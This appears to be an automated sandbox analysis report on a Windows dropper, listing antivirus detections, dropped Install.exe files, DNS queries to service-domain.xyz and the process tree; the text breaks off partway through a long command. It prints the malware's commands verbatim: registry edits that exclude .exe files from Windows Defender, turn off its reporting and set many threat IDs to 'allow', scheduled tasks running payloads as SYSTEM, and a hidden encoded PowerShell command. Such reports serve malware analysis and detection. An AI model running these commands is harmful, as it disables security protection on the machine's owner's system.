Source: file.exe |
ReversingLabs: Detection: 39% |
Source: service-domain.xyz |
Virustotal: Detection: 11% |
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe |
Avira: detection malicious, Label: HEUR/AGEN.1250601 |
Source: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exe |
Avira: detection malicious, Label: HEUR/AGEN.1250601 |
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe |
Avira: detection malicious, Label: HEUR/AGEN.1250601 |
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe |
ReversingLabs: Detection: 41% |
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe |
ReversingLabs: Detection: 51% |
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe |
ReversingLabs: Detection: 51% |
Source: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exe |
ReversingLabs: Detection: 51% |
Source: file.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0040553A FindFirstFileA, |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA, |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Temp\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\__data__\ |
Source: |
DNS query: service-domain.xyz |
Source: powershell.exe, 00000011.00000002.412093333.000001A8F98D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.440371614.000000000287E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000011.00000002.403370580.000001A8F7925000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micr |
Source: powershell.exe, 00000011.00000002.331705203.000001A88156F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.306360805.000001A880270000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.394976607.000001A8901A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000011.00000002.303899135.000001A880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.447061574.0000000002F01000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: powershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000011.00000002.413168251.000001A8F993B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://go.microsoft.co |
Source: powershell.exe, 00000011.00000002.331705203.000001A88156F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.306360805.000001A880270000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.394976607.000001A8901A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.org |
Source: powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.orgX |
Source: powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand |
Source: unknown |
DNS traffic detected: queries for: service-domain.xyz |
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe |
Process created: Commandline size = 3260 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe |
File deleted: C:\Windows\SysWOW64\GroupPolicykaNvH |
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe |
File created: C:\Windows\system32\GroupPolicy\gpt.ini |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004162A6 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0040E5A5 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004126B0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00403A01 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00418EF1 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00418FCB |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_02E4C238 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_02E4C2C3 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_02E4C300 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_02E4F2B8 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_06269720 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_06279078 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_0627E049 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_0627E058 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_06270006 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_06270040 |
Source: C:\Users\user\Desktop\file.exe |
Code function: String function: 00403A9C appears 33 times |
|
Source: C:\Users\user\Desktop\file.exe |
Code function: String function: 00413954 appears 179 times |
|
Source: file.exe, 00000000.00000000.246681681.0000000000427000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe |
Source: file.exe |
Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 |
Source: Joe Sandbox View |
Dropped File: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe 8B691E37EECDDAACD1BB83067CE261157895DEC8302E558C5C9D159C117151A4 |
Source: Joe Sandbox View |
Dropped File: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B |
Source: Joe Sandbox View |
Dropped File: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B |
Source: C:\Users\user\Desktop\file.exe |
File read: C:\Users\user\Desktop\file.exe |
Source: file.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\file.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: unknown |
Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe |
|
Source: C:\Users\user\Desktop\file.exe |
Process created: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe .\Install.exe |
|
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe |
Process created: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe .\Install.exe /S /site_id "525403" |
|
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gbyyEslRl" |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force |
|
Source: C:\Windows\System32\gpupdate.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Windows\System32\gpscript.exe gpscript.exe /RefreshSystemParam |
|
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gbyyEslRl" |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:16:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe\" DC /site_id 525403 /S" /V1 /F |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe DC /site_id 525403 /S |
|
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 
\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAc |